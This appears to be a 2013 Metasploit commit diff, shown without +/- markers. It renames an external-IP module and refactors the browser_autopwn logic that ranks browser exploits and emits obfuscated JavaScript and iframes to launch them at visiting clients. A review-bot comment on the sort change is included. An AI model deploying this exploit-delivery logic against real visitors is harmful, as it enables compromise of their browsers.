bug/bundler_fix
jvazquez-r7 2013-03-21 09:07:41 +01:00
commit b30a5aa6e8
3 changed files with 74 additions and 85 deletions


@ -17,8 +17,13 @@ class Metasploit3 < Msf::Auxiliary
def initialize
super(
'Name' => 'External IP',
'Description' => 'This module checks for the public source IP address of the current route to the RHOST',
'Name' => 'Discover External IP via Ifconfig.me',
'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan'],
'License' => MSF_LICENSE,
'References' =>


@ -385,8 +385,8 @@ class Metasploit3 < Msf::Auxiliary
def start_exploit_modules()
@lhost = (datastore['LHOST'] || "0.0.0.0")
@js_tests = {}
@noscript_tests = {}
@all_tests = {}
print_line
print_status("Starting exploit modules on host #{@lhost}...")
@ -446,20 +446,24 @@ class Metasploit3 < Msf::Auxiliary
end
# Now that we've got all of our exploit tests put together,
# organize them into requires-scripting and
# doesnt-require-scripting, sorted by browser name.
# organize them into an all tests (JS and no-JS), organized by rank,
# and doesnt-require-scripting (no-JS), organized by browser name.
if apo[:javascript] && apo[:ua_name]
@js_tests[apo[:ua_name]] ||= []
@js_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
elsif apo[:javascript]
@js_tests["generic"] ||= []
@js_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
elsif apo[:ua_name]
@noscript_tests[apo[:ua_name]] ||= []
@noscript_tests[apo[:ua_name]].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
else
@noscript_tests["generic"] ||= []
@noscript_tests["generic"].push(apo)
@all_tests[apo[:rank]] ||= []
@all_tests[apo[:rank]].push(apo)
end
end
@ -501,9 +505,8 @@ class Metasploit3 < Msf::Auxiliary
print_line
# Sort the tests by reliability, descending.
@js_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
}
# I don't like doing this directly (wihout a !), but any other sort wasn't sticking - NE
@all_tests = @all_tests.sort.reverse
# This matters a lot less for noscript exploits since they basically
# get thrown into a big pile of iframes that the browser will load
@ -511,7 +514,6 @@ class Metasploit3 < Msf::Auxiliary
@noscript_tests.each { |browser,tests|
tests.sort! {|a,b| b[:rank] <=> a[:rank]}
}
end
#
@ -746,7 +748,10 @@ class Metasploit3 < Msf::Auxiliary
# if we have no client_info, this will add all tests. Otherwise tries
# to only send tests for exploits that target the client's detected
# browser.
@js_tests.each { |browser, sploits|
@all_tests.each { |rank, sploits|
sploits.each { |s|
browser = s[:ua_name] || "generic"
next unless client_matches_browser(client_info, browser)
# Send all the generics regardless of what the client is. If the
@ -754,8 +759,8 @@ class Metasploit3 < Msf::Auxiliary
# on the side of shells and send everything. Otherwise, send only
# if the client is using the browser associated with this set of
# exploits.
if s[:javascript]
if (browser == "generic" || client_info.nil? || [nil, browser].include?(client_info[:ua_name]))
sploits.each do |s|
if s[:vuln_test].nil? or s[:vuln_test].empty?
test = "is_vuln = true"
else
@ -777,6 +782,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
js << "global_exploit_list[global_exploit_list.length] = {\n"
js << " 'test':'#{test}',\n"
js << " 'resource':'#{res}'\n"
@ -784,17 +790,7 @@ class Metasploit3 < Msf::Auxiliary
sploits_for_this_client.push s[:name]
sploit_cnt += 1
end
end
}
# Add a javaEnabled() test specifically for java exploits. Other
# exploits that don't require javascript go into a big pile of iframes
# that will be dumped out after other exploitation is done, assuming
# the browser didn't stop somewhere along the way due to a successful
# exploit or a crash from all the memory raping we just did.
noscript_html = ""
@noscript_tests.each { |browser, sploits|
sploits.each do |s|
else
if s[:name] =~ %r|/java_|
res = exploit_resource(s[:name]).gsub("\n",'').gsub("'", "\\\\'")
js << "global_exploit_list[global_exploit_list.length] = {\n"
@ -810,18 +806,7 @@ class Metasploit3 < Msf::Auxiliary
sploit_cnt += 1
end
}
# If all of our exploits that require javascript fail, try to continue
# with those that don't
js << %Q|var noscript_exploits = "|
js << Rex::Text.to_hex(noscript_html, "%")
js << %Q|";\n|
js << %Q|var noscript_div = document.createElement("div");\n|
# Have to use innerHTML here to render the new iframes. Using
# document.createElement and appendChild() will escape all the
# entities.
js << %Q|noscript_div.innerHTML = unescape(noscript_exploits);\n|
js << %Q|document.body.appendChild(noscript_div);\n|
}
js << "#{js_debug("'starting exploits (' + global_exploit_list.length + ' total)<br>'")}\n"
js << "window.next_exploit(0);\n"
@ -830,7 +815,6 @@ class Metasploit3 < Msf::Auxiliary
js.obfuscate unless datastore["DEBUG"]
response.body = "#{js}"
print_status("Responding with #{sploit_cnt} exploits")
sploits_for_this_client.each do |name|
vprint_status("* #{name}")
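Review bot: In the sort hunk, `@all_tests = @all_tests.sort.reverse` rebinds the instance variable from a Hash keyed by rank to an Array of `[rank, sploits]` pairs, and the comment beside it does not say so; the later `@all_tests.each { |rank, sploits|` still destructures the pairs, but anything that afterwards looks up `@all_tests[rank]` would no longer get that rank's list. I would replace the comment with `# Hash has no sort!; Hash#sort returns [[rank, sploits], ...], so @all_tests is an Array from here on`. The sort compares the rank keys directly, so it would raise if any entry has a nil `apo[:rank]`; the code that builds `apo` is outside the hunk, so that is worth confirming. Separately, as far as the rendered page shows, all four branches of the `if apo[:javascript] && apo[:ua_name]` chain now end with the same two `@all_tests[apo[:rank]]` lines, and a single `(@all_tests[apo[:rank]] ||= []) << apo` before the `if` would remove the repetition.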


@ -277,7 +277,7 @@ class Msftidy
if @source =~ /'Name'[[:space:]]*=>[[:space:]]*['"](.+)['"],*$/
words = $1.split
words.each do |word|
if %w{and or the for to in of as with a an on at}.include?(word)
if %w{and or the for to in of as with a an on at via}.include?(word)
next
elsif %w{pbot}.include?(word)
elsif word =~ /^[a-z]+$/